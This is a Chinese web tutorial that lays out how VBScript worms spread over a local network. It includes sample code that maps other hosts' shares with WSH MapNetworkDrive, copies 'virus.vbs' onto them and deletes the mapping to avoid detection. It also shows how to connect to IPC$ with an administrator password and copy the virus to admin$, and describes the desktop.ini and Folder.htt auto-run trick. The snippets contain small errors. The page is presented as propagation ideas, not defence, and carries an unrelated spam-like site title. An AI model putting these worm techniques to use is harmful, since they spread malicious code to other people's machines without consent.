雷火电竞-中国电竞赛事及体育赛事平台

歡迎來到入門教程網(wǎng)!

vb

當前位置:主頁 > 軟件編程 > vb >

利用WSH里的MapNetworkDrive方法腳本蠕蟲的傳播方式

來源:本站原創(chuàng)|時間:2020-01-10|欄目:vb|點擊:

我近日在網(wǎng)絡(luò)上看到了一些關(guān)于局域網(wǎng)腳本蠕蟲的傳播方式的一些討論,這里提供一些思路。
1. 利用WSH里的MapNetworkDrive方法。該方法是將網(wǎng)絡(luò)驅(qū)動器映射到本地。
MapNetworkDrive方法:
object.MapNetworkDrive(strLocalName, strRemoteName, [bUpdateProfile], [strUser], [strPassword])
參數(shù)
object 
WshNetwork 對象。 
strLocalName 
表示映射驅(qū)動器的本地名的字符串值。 
strRemoteName 
表示共享的 UNC 名稱 (\\xxx\yyy) 的字符串值。 
bUpdateProfile 
可選。表示映射信息是否存儲在當前的用戶配置文件中的布爾值。如果提供的 bUpdateProfile 的值為 true,則該映射存儲在用戶的配置文件中(默認值為 false)。 
strUser 
可選。表示用戶名的字符串值。如果使用當前用戶以外的其他用戶的憑據(jù)來映射網(wǎng)絡(luò)驅(qū)動器,則必須提供該參數(shù)。 
strPassword 
可選。表示用戶密碼的字符串值。如果使用當前用戶以外的其他用戶的憑據(jù)來映射網(wǎng)絡(luò)驅(qū)動器,則必須提供該參數(shù)。 
說明
嘗試映射非共享的網(wǎng)絡(luò)驅(qū)動器時將產(chǎn)生錯誤。
主要原理是:得到本機的LAN地址后(一般為192.168.*.*)將其他主機的共享目錄映射為本地的驅(qū)動器(如Z:),然后將病毒復(fù)制到映射的本地驅(qū)動器Z:,這樣就把病毒復(fù)制到其他主機的目錄去了。最后,還要使用RemoveNetworkDrive方法刪除映射,以免被發(fā)現(xiàn)。
RemoveNetworkDrive方法:
object.RemoveNetworkDrive(strName, [bForce], [bUpdateProfile])
參數(shù)
object 
WshNetwork 對象。 
strName 
表示要刪除的映射驅(qū)動器名的字符串值。strName 參數(shù)可以是本地名稱,也可以是遠程名稱,這取決于驅(qū)動器的映射方法。 
bForce 
可選。表示是否強制刪除映射驅(qū)動器的布爾值。如果提供的 bForce 的值為 true,則無論該資源是否正在使用,該方法都刪除這些連接。 
bUpdateProfile 
可選。表示是否從用戶的配置文件中刪除映射的字符串值。如果提供 bUpdateProfile 且其值為 true,則從用戶配置文件中刪除該映射。bUpdateProfile 的默認值為 false。 
說明
如果在本地名稱(驅(qū)動器名)和遠程名稱(UNC 名稱)之間存在映射關(guān)系,則 strName 必須設(shè)置為本地名稱。如網(wǎng)絡(luò)路徑中不存在本地名稱(驅(qū)動器字母)映射,則 strName 必須設(shè)為遠程名稱。
我這里給一段VBS的示例代碼:
Set myfso= CreateObject("Scripting.FileSystemObject") 
Set WshNetwork = WScript.CreateObject("WScript.Network") 
WshNetwork.MapNetworkDrive "I:", "\\" & unc 
fso.copyfile "c:\virus.vbs " ,"I:\virus.vbs.txt"
WshNetwork.RemoveNetworkDrive "I:"
2. 利用IPC$進行連接。這種方式估計玩HACK的朋友比較熟悉啦!原理就是利用WSCRIPT.SHELL來執(zhí)行。具體可以參考各種IPC$攻擊傻瓜教程,這里僅提供一段代碼:
Set objshell=wscript.createobject("wscript.shell")
Dim st,sc
st="net use \\" & "192.168.0.1 \IPC$ "& pass &" /" & "administrator"
objshell.run st
sc="copy c:\virus.vbs \\192.168.0.1\admin$"
objshell.run sc
3. 就是像“新歡樂時光”病毒一樣的利用FOLDER.HTT的被動式進行傳播。
Desktop.ini: 活動桌面的配置文件
Desktop.ini定義了它所在的文件夾在桌面上或者在資源管理器中的顯示風(fēng)格以及文件夾的某些屬性。
關(guān)鍵:WebViewTemplate.NT5=file://Folder.htt
就是修改desktop.ini使其指向同目錄下的folder.htt,當以WEB視圖打開文件夾時,就會按照desktop.ini里面的設(shè)置執(zhí)行folder.htt。這樣我們就可以把病毒寫入folder.htt,使之不斷復(fù)制。
具體參見其他有關(guān)新歡樂時光的病毒分析。

上一篇:VBS教程:函數(shù)-Array 函數(shù)

欄    目:vb

下一篇:Vbscript寫注冊表的方法

本文標題:利用WSH里的MapNetworkDrive方法腳本蠕蟲的傳播方式

本文地址:http://www.jygsgssxh.com/a1/vb/8031.html

網(wǎng)頁制作CMS教程網(wǎng)絡(luò)編程軟件編程腳本語言數(shù)據(jù)庫服務(wù)器

如果侵犯了您的權(quán)利,請與我們聯(lián)系,我們將在24小時內(nèi)進行處理、任何非本站因素導(dǎo)致的法律后果,本站均不負任何責(zé)任。

聯(lián)系QQ:835971066 | 郵箱:835971066#qq.com(#換成@)

Copyright © 2002-2020 腳本教程網(wǎng) 版權(quán)所有